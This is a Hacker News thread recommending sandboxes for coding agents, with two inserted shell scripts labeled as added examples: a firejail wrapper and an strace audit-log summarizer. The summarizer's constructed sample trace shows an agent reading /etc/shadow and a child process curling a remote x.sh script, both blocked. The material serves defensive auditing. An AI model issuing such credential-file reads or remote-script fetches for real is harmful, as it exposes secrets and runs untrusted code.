Ask HN: Secure wrapper for coding agents?
19 points by rjzzleep a day ago | 15 comments
I believe someone recently posted sort of a secure harness/wrapper for running coding agents in a secure sandbox. I can't find the project. Of course I can make my own wrapper with systemd-nspawn, kata or bspawn, but I believe I saw a decently well-maintained project just a while back. Does anyone have a suggestion or link? It's become extremely hard to find things on GitHub with all the generated projects.
pixdamix a day ago
If you're on a Mac, look up https://bromure.io/en/agentic-coding (look up the browser too: https://bromure.io/en/secure-web). Everything you see is made by Claude (and Renaud Deraison :-)) and working quite well, judging from the demos. See here for more details (in French, but English subs available, and more): https://www.sstic.org/2026/presentation/cloture_2026/
binsquare 4 hours ago
I built a local, cross-platform virtual machine for this purpose: https://github.com/smol-machines/smolvm
sanju3026 a day ago
I believe you're looking for Era. It uses libkrun for local microVM isolation and was built specifically to solve the "LLM hallucinated a destructive bash command" problem without the overhead of a massive VM. Another one that handles this gracefully is Yolobox, which uses rootless Podman. Both are actively maintained and cut through the noise of the thousands of generic wrapper repos out there right now.
clusterhacks 9 hours ago
This may be too naive, but I created a user on my Linux box who doesn't have very many permissions. Then I sudo to that user, use firejail to start pi in a dev project directory, and let it have at it. My projects are usually very limited with respect to external dependencies, and that is part of prompts or markdown files describing various project goals, plans, and current state. My operating theory is that this probably won't get my systems borked. I wasn't patient enough to dig deeper.
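The low-privilege-user-plus-firejail setup described in the comment above, written out as a wrapper script. This is an added example, not code posted by clusterhacks or shipped by firejail; the account name "agent" is an assumption (the comment does not name it), the agent command "pi" is the one the comment mentions, and both can be overridden through AGENT_USER and AGENT_CMD. The check that refuses to sandbox your whole home directory or a dot-directory is the caveat most worth adding to this approach: `--private=DIR` exposes DIR as the sandbox's home, so pointing it at `~` or `~/.ssh` defeats the purpose.

```sh
#!/bin/sh
# Added example, not code from the thread. Runs a coding agent as a dedicated
# low-privilege user inside firejail, with one project directory visible as the
# sandbox's home. AGENT_USER="agent" is an assumption, not a fact from the post.
AGENT_USER="${AGENT_USER:-agent}"
AGENT_CMD="${AGENT_CMD:-pi}"

# Returns 0 when DIR ($1) is a reasonable thing to hand the sandbox, 1 otherwise.
# HOME_DIR ($2, default $HOME) is the invoking user's real home, which must never
# be exposed whole. Refuses: relative paths, "/", the home directory itself,
# any dot-component (e.g. ~/.ssh, ~/.config) and paths containing whitespace
# (the argument assembly below word-splits on whitespace).
project_dir_is_safe() {
    dir=$1
    home_dir=${2:-$HOME}
    case "$dir" in
        /*) ;;            # absolute: keep checking
        *)  return 1 ;;   # relative path: refuse
    esac
    dir=${dir%/}          # drop one trailing slash before comparing
    if [ -z "$dir" ]; then return 1; fi                # was "/"
    if [ "$dir" = "${home_dir%/}" ]; then return 1; fi # the whole home
    case "$dir" in
        */.*)           return 1 ;;   # dot-component somewhere in the path
        *[[:space:]]*)  return 1 ;;   # whitespace would break $(...) splitting
    esac
    return 0
}

# Print one firejail option per line for confining the agent to DIR ($1).
# Network stays on by default because the agent needs its model API; set
# AGENT_NET=none to cut it (e.g. when the model runs locally).
build_firejail_args() {
    dir=$1
    printf '%s\n' \
        --noprofile \
        "--private=$dir" \
        --private-tmp \
        --private-dev \
        --noroot \
        --caps.drop=all \
        --nonewprivs \
        --seccomp \
        --nosound
    if [ "${AGENT_NET:-}" = "none" ]; then
        printf '%s\n' --net=none
    fi
}

# Switch to the low-privilege user and launch the agent inside the jail.
# Usage: run_agent /abs/path/to/project [agent args...]
run_agent() {
    dir=$1; shift
    if ! project_dir_is_safe "$dir"; then
        echo "refusing to sandbox '$dir': give an absolute project path that is not your home or a dot-directory" >&2
        return 2
    fi
    # shellcheck disable=SC2046  (intentional word splitting; args contain no whitespace, enforced above)
    sudo -u "$AGENT_USER" -- firejail $(build_firejail_args "$dir") -- "$AGENT_CMD" "$@"
}

if [ $# -gt 0 ]; then
    run_agent "$@"
fi
```

The project directory has to be readable and writable by the agent account (chown it, or share a group), since sudo switches user before firejail starts. `--private` hides the rest of the invoking user's home, but system directories remain visible as they normally are, which is why the separate unprivileged user in the comment still matters: it is what limits damage outside the project tree if the jail is misconfigured.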
ca_tech a day ago
If you are running macOS, I would recommend Agent Safehouse. It's well maintained and built on the existing sandbox-exec, so you are not locked in and can always build your own rules independent of the CLI tool. https://github.com/eugene1g/agent-safehouse/ https://agent-safehouse.dev/ Originally posted on HN: https://news.ycombinator.com/item?id=47301085
sakuraiben a day ago
Take a look at https://github.com/Tako-Research/TakoVM!
aborsy a day ago
Docker has introduced sandboxes for this purpose.
Jeremy1026 a day ago
agent-pd was posted as a Show HN fairly recently, might be what you are remembering? https://github.com/varmabudharaju/agent-pd/
felixlu2026 19 hours ago
For coding agents, I care less about sandbox branding and more about boring audit logs. What did it read, what did it write, and what was blocked?
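One cheap way to get the "what did it read, write, and get blocked on" log the comment above asks for, regardless of which sandbox is in use: record the agent's process tree with strace and reduce the trace to those three questions. This is an added example, not code from felixlu2026 or from any of the projects in the thread. The sample trace embedded in the script is constructed for illustration (PIDs, paths and the 203.0.113.0/24 and 198.51.100.0/24 addresses are documentation values), not a capture from a real session.

```sh
#!/bin/sh
# Added example, not code from the thread. Turns a plain strace recording of an
# agent into a read/write/exec/net/blocked summary. The sample trace below is
# constructed, not a real session.

# Record file and network system calls of CMD and all of its children.
# Usage: record_agent LOGFILE CMD [ARGS...]
record_agent() {
    log=$1; shift
    strace -f -qq -o "$log" -e trace=file,network -- "$@"
}

# Classify each traced call. Output is TAB-separated: category, then detail.
#   read <path>              open/openat without write flags
#   write <path>             open with O_WRONLY/O_RDWR/O_CREAT/O_TRUNC, unlink, rename, mkdir, chmod, ...
#   exec <path>              successful execve
#   net <address>            successful connect()
#   blocked <call> <detail>  any call that failed with EACCES or EPERM
# strace's own signal/exit lines and interleaved "<unfinished ...>" calls are skipped.
summarize_trace() {
    awk '
        !/^[0-9]+ +[a-z_0-9]+\(/ { next }            # not a "pid syscall(" line
        /<unfinished \.\.\.>$/   { next }            # no result on this line
        {
            sub(/^[0-9]+ +/, "")                     # drop the pid column
            call = $0; sub(/\(.*/, "", call)         # syscall name
            res = $0;  sub(/.* = /, "", res)         # text after the last " = "
            detail = ""
            if (match($0, /"[^"]*"/))                # first quoted string: path or address
                detail = substr($0, RSTART + 1, RLENGTH - 2)
            if (res ~ /^-1 (EACCES|EPERM)/) {
                print "blocked\t" call "\t" detail; next
            }
            if (call == "open" || call == "openat") {
                if ($0 ~ /O_WRONLY|O_RDWR|O_CREAT|O_TRUNC/) print "write\t" detail
                else                                      print "read\t" detail
            } else if (call ~ /^(creat|unlink|unlinkat|rename|renameat|renameat2|mkdir|mkdirat|rmdir|chmod|fchmodat|chown|lchown|truncate|symlink|symlinkat|link|linkat)$/) {
                print "write\t" detail
            } else if (call == "execve") {
                print "exec\t" detail
            } else if (call == "connect") {
                print "net\t" detail
            }
        }' "$1"
}

# Count entries of one category (read, write, exec, net, blocked) in LOGFILE.
count_category() {
    summarize_trace "$1" | awk -F '\t' -v c="$2" '$1 == c { n++ } END { print n + 0 }'
}

# Constructed strace -f excerpt in the format the parser expects: an agent
# editing a Go project, probing /etc/shadow, and a child that tries to fetch
# and run a script. Not a real capture.
write_sample_trace() {
    cat > "$1" <<'EOF'
4212 openat(AT_FDCWD, "/home/agent/proj/main.go", O_RDONLY|O_CLOEXEC) = 3
4212 openat(AT_FDCWD, "/home/agent/proj/go.mod", O_RDONLY|O_CLOEXEC) = 4
4212 openat(AT_FDCWD, "/home/agent/proj/main_test.go", O_WRONLY|O_CREAT|O_TRUNC|O_CLOEXEC, 0644) = 5
4212 unlink("/home/agent/proj/.agent.lock") = 0
4212 openat(AT_FDCWD, "/etc/shadow", O_RDONLY|O_CLOEXEC) = -1 EACCES (Permission denied)
4212 connect(6, {sa_family=AF_INET, sin_port=htons(443), sin_addr=inet_addr("203.0.113.10")}, 16) = 0
4213 execve("/usr/bin/go", ["go", "test", "./..."], 0x5600 /* 12 vars */) = 0
4214 execve("/usr/bin/curl", ["curl", "http://198.51.100.7/x.sh"], 0x5600 /* 12 vars */) = -1 EACCES (Permission denied)
4214 connect(7, {sa_family=AF_INET, sin_port=htons(80), sin_addr=inet_addr("198.51.100.7")}, 16) = -1 EPERM (Operation not permitted)
4213 --- SIGCHLD {si_signo=SIGCHLD, si_code=CLD_EXITED, si_pid=4214, si_uid=1001, si_status=1} ---
4214 +++ exited with 1 +++
EOF
}
```

Two caveats when reading the "blocked" column. strace needs ptrace, so this works on an unsandboxed run (useful for learning what the agent touches before writing a sandbox profile) or inside a sandbox whose seccomp filter permits ptrace; filters that deny it, and firejail's setuid wrapper when traced by a non-root user, will stop it. And namespace-based sandboxes usually make hidden paths look non-existent (ENOENT) rather than denied, so only EACCES/EPERM is counted here and whitelist-style sandboxes will undercount what was actually kept out of reach.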
rohityin a day ago
Have you thought about Docker?